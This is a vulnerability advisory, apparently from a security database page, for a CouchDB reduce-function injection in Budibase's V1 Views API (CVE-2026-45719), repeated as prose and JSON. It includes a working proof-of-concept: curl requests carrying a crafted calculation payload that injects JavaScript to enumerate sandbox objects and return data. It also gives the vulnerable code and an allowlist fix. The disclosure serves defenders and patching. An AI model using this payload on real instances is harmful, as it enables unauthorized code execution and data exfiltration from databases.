GHSA-363W-HVWH-W7M6

Vulnerability from github – Published: 2026-05-18 17:47 – Updated: 2026-06-08 23:51
VLAI
Summary
Budibase: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API
Details

Security Advisory: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API

Affected Software: Budibase Affected Component: packages/server/src/api/controllers/view/viewBuilder.ts, packages/server/src/api/routes/view.ts CWE: CWE-94 (Improper Control of Generation of Code) Discovery Date: 2026-03-24

Summary

The V1 Views API (POST /api/views) accepts a calculation parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal SCHEMA_MAP object defines the valid calculation types (sum, count, stats), no actual validation is performed against this map before the value is used in string interpolation.

A user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried.

Affected Component

Route: POST /api/views (V1 legacy views endpoint) File: packages/server/src/api/routes/view.ts, line 45

.post("/api/views", viewController.v1.save)

Note: This route has no Joi request body validator, unlike the V2 views endpoint which uses viewValidator().

Vulnerable code: packages/server/src/api/controllers/view/viewBuilder.ts, line 213

const reduction = field && calculation ? { reduce: `_${calculation}` } : {}

return {
  meta: { field, tableId, groupBy, filters, schema, calculation, ... },
  map: `function (doc) { ... }`,
  ...reduction,    // <-- unvalidated calculation string becomes CouchDB reduce
}

Vulnerability Detail

The viewBuilder function constructs a CouchDB design document view definition. It correctly sanitizes all inputs that flow into the map function string (using JSON.stringify for field names and a strict TOKEN_MAP allowlist for filter operators).

However, the calculation parameter follows a different path:

  1. User submits calculation via POST /api/views request body
  2. No Joi validator is present on this V1 route
  3. viewBuilder receives calculation as a raw string
  4. It is interpolated as: reduce: `_${calculation}`
  5. This reduce definition is saved to a CouchDB design document
  6. When the view is queried, CouchDB evaluates the reduce value

CouchDB's behavior for reduce functions: - Values starting with _ followed by a known built-in (_sum, _count, _stats) are executed as native reducers - Any other value is treated as a JavaScript function string and executed in CouchDB's SpiderMonkey JS engine

The SCHEMA_MAP object in the same file defines sum, count, and stats as valid keys, but this map is only used for schema construction — it is never used as an input validator for the calculation parameter.

Steps to Reproduce

Prerequisites: Authenticated session with Builder role permissions.

1. Send a crafted view creation request:

curl -X POST https://<budibase-instance>/api/views \
  -H "Content-Type: application/json" \
  -H "Cookie: <builder-session-cookie>" \
  -d '{
    "name": "test_view",
    "tableId": "<valid-table-id>",
    "field": "amount",
    "calculation": "stats\"); } function(keys,values,rereduce){ var data = \"\"; for(var i in this) { data += i + \"=\" + this[i] + \",\"; } return data; } //"
  }'

2. Query the created view:

curl https://<budibase-instance>/api/views/test_view?group=true \
  -H "Cookie: <builder-session-cookie>"

3. Expected result: The injected JavaScript function executes in CouchDB's JS context during reduce evaluation. The function can: - Enumerate objects available in the CouchDB sandbox - Access document data from the reduce values parameter - Return arbitrary data in the view response

Simplified test: To verify the injection point without complex payloads:

{
  "name": "calc_test",
  "tableId": "<valid-table-id>",
  "field": "amount",
  "calculation": "INVALID_NOT_A_BUILTIN"
}

This produces reduce: "_INVALID_NOT_A_BUILTIN". CouchDB will reject this as neither a valid built-in nor a valid function, confirming that arbitrary strings reach the reduce evaluator.

Impact

  • Code execution: Arbitrary JavaScript runs in CouchDB's SpiderMonkey sandbox
  • Data access: The reduce function receives all matching document values, allowing data exfiltration across the database
  • Scope limitation: CouchDB's JS sandbox prevents filesystem or network access — this is not OS-level RCE
  • Authentication required: Attacker must have Builder role, which already grants significant application access
  • Persistence: The injected reduce function persists in the design document and executes on every view query

Recommended Fix

Add an allowlist validation in viewBuilder before the reduce interpolation:

const VALID_CALCULATIONS = ["sum", "count", "stats"];

if (calculation && !VALID_CALCULATIONS.includes(calculation)) {
  throw new Error(`Invalid calculation type: ${calculation}`);
}

const reduction = field && calculation ? { reduce: `_${calculation}` } : {};

Additionally, add a Joi validator to the V1 views route to match the V2 endpoint:

// In packages/server/src/api/routes/view.ts
.post("/api/views", v1ViewValidator(), viewController.v1.save)

Additional Context

The V2 views API (POST /api/v2/views) uses viewValidator() with Joi schema validation and a separate calculation handling path. This finding is specific to the V1 legacy endpoint which lacks equivalent input validation.

The map function string in the same code is properly protected — all user inputs reaching it are escaped via JSON.stringify() or validated against a strict TOKEN_MAP allowlist. Only the reduce path is affected.

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.38.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45719"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T17:47:58Z",
    "nvd_published_at": "2026-05-27T18:16:26Z",
    "severity": "MODERATE"
  },
  "details": "# Security Advisory: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API\n\n**Affected Software:** Budibase\n**Affected Component:** `packages/server/src/api/controllers/view/viewBuilder.ts`, `packages/server/src/api/routes/view.ts`\n**CWE:** CWE-94 (Improper Control of Generation of Code)\n**Discovery Date:** 2026-03-24\n\n---\n\n## Summary\n\nThe V1 Views API (`POST /api/views`) accepts a `calculation` parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal `SCHEMA_MAP` object defines the valid calculation types (`sum`, `count`, `stats`), no actual validation is performed against this map before the value is used in string interpolation.\n\nA user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried.\n\n---\n\n## Affected Component\n\n**Route:** `POST /api/views` (V1 legacy views endpoint)\n**File:** `packages/server/src/api/routes/view.ts`, line 45\n\n```js\n.post(\"/api/views\", viewController.v1.save)\n```\n\nNote: This route has no Joi request body validator, unlike the V2 views endpoint which uses `viewValidator()`.\n\n**Vulnerable code:** `packages/server/src/api/controllers/view/viewBuilder.ts`, line 213\n\n```js\nconst reduction = field \u0026\u0026 calculation ? { reduce: `_${calculation}` } : {}\n\nreturn {\n  meta: { field, tableId, groupBy, filters, schema, calculation, ... },\n  map: `function (doc) { ... }`,\n  ...reduction,    // \u003c-- unvalidated calculation string becomes CouchDB reduce\n}\n```\n\n---\n\n## Vulnerability Detail\n\nThe `viewBuilder` function constructs a CouchDB design document view definition. It correctly sanitizes all inputs that flow into the `map` function string (using `JSON.stringify` for field names and a strict `TOKEN_MAP` allowlist for filter operators).\n\nHowever, the `calculation` parameter follows a different path:\n\n1. User submits `calculation` via `POST /api/views` request body\n2. No Joi validator is present on this V1 route\n3. `viewBuilder` receives `calculation` as a raw string\n4. It is interpolated as: `` reduce: `_${calculation}` ``\n5. This reduce definition is saved to a CouchDB design document\n6. When the view is queried, CouchDB evaluates the reduce value\n\nCouchDB\u0027s behavior for reduce functions:\n- Values starting with `_` followed by a known built-in (`_sum`, `_count`, `_stats`) are executed as native reducers\n- Any other value is treated as a **JavaScript function string** and executed in CouchDB\u0027s SpiderMonkey JS engine\n\nThe `SCHEMA_MAP` object in the same file defines `sum`, `count`, and `stats` as valid keys, but this map is only used for schema construction \u2014 it is never used as an input validator for the `calculation` parameter.\n\n---\n\n## Steps to Reproduce\n\n**Prerequisites:** Authenticated session with Builder role permissions.\n\n**1. Send a crafted view creation request:**\n\n```bash\ncurl -X POST https://\u003cbudibase-instance\u003e/api/views \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Cookie: \u003cbuilder-session-cookie\u003e\" \\\n  -d \u0027{\n    \"name\": \"test_view\",\n    \"tableId\": \"\u003cvalid-table-id\u003e\",\n    \"field\": \"amount\",\n    \"calculation\": \"stats\\\"); } function(keys,values,rereduce){ var data = \\\"\\\"; for(var i in this) { data += i + \\\"=\\\" + this[i] + \\\",\\\"; } return data; } //\"\n  }\u0027\n```\n\n**2. Query the created view:**\n\n```bash\ncurl https://\u003cbudibase-instance\u003e/api/views/test_view?group=true \\\n  -H \"Cookie: \u003cbuilder-session-cookie\u003e\"\n```\n\n**3. Expected result:** The injected JavaScript function executes in CouchDB\u0027s JS context during reduce evaluation. The function can:\n- Enumerate objects available in the CouchDB sandbox\n- Access document data from the reduce `values` parameter\n- Return arbitrary data in the view response\n\n**Simplified test:** To verify the injection point without complex payloads:\n\n```json\n{\n  \"name\": \"calc_test\",\n  \"tableId\": \"\u003cvalid-table-id\u003e\",\n  \"field\": \"amount\",\n  \"calculation\": \"INVALID_NOT_A_BUILTIN\"\n}\n```\n\nThis produces `reduce: \"_INVALID_NOT_A_BUILTIN\"`. CouchDB will reject this as neither a valid built-in nor a valid function, confirming that arbitrary strings reach the reduce evaluator.\n\n---\n\n## Impact\n\n- **Code execution:** Arbitrary JavaScript runs in CouchDB\u0027s SpiderMonkey sandbox\n- **Data access:** The reduce function receives all matching document values, allowing data exfiltration across the database\n- **Scope limitation:** CouchDB\u0027s JS sandbox prevents filesystem or network access \u2014 this is not OS-level RCE\n- **Authentication required:** Attacker must have Builder role, which already grants significant application access\n- **Persistence:** The injected reduce function persists in the design document and executes on every view query\n\n---\n\n## Recommended Fix\n\nAdd an allowlist validation in `viewBuilder` before the reduce interpolation:\n\n```typescript\nconst VALID_CALCULATIONS = [\"sum\", \"count\", \"stats\"];\n\nif (calculation \u0026\u0026 !VALID_CALCULATIONS.includes(calculation)) {\n  throw new Error(`Invalid calculation type: ${calculation}`);\n}\n\nconst reduction = field \u0026\u0026 calculation ? { reduce: `_${calculation}` } : {};\n```\n\nAdditionally, add a Joi validator to the V1 views route to match the V2 endpoint:\n\n```typescript\n// In packages/server/src/api/routes/view.ts\n.post(\"/api/views\", v1ViewValidator(), viewController.v1.save)\n```\n\n---\n\n## Additional Context\n\nThe V2 views API (`POST /api/v2/views`) uses `viewValidator()` with Joi schema validation and a separate calculation handling path. This finding is specific to the V1 legacy endpoint which lacks equivalent input validation.\n\nThe `map` function string in the same code is properly protected \u2014 all user inputs reaching it are escaped via `JSON.stringify()` or validated against a strict `TOKEN_MAP` allowlist. Only the `reduce` path is affected.",
  "id": "GHSA-363w-hvwh-w7m6",
  "modified": "2026-06-08T23:51:48Z",
  "published": "2026-05-18T17:47:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-363w-hvwh-w7m6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45719"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/3.38.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.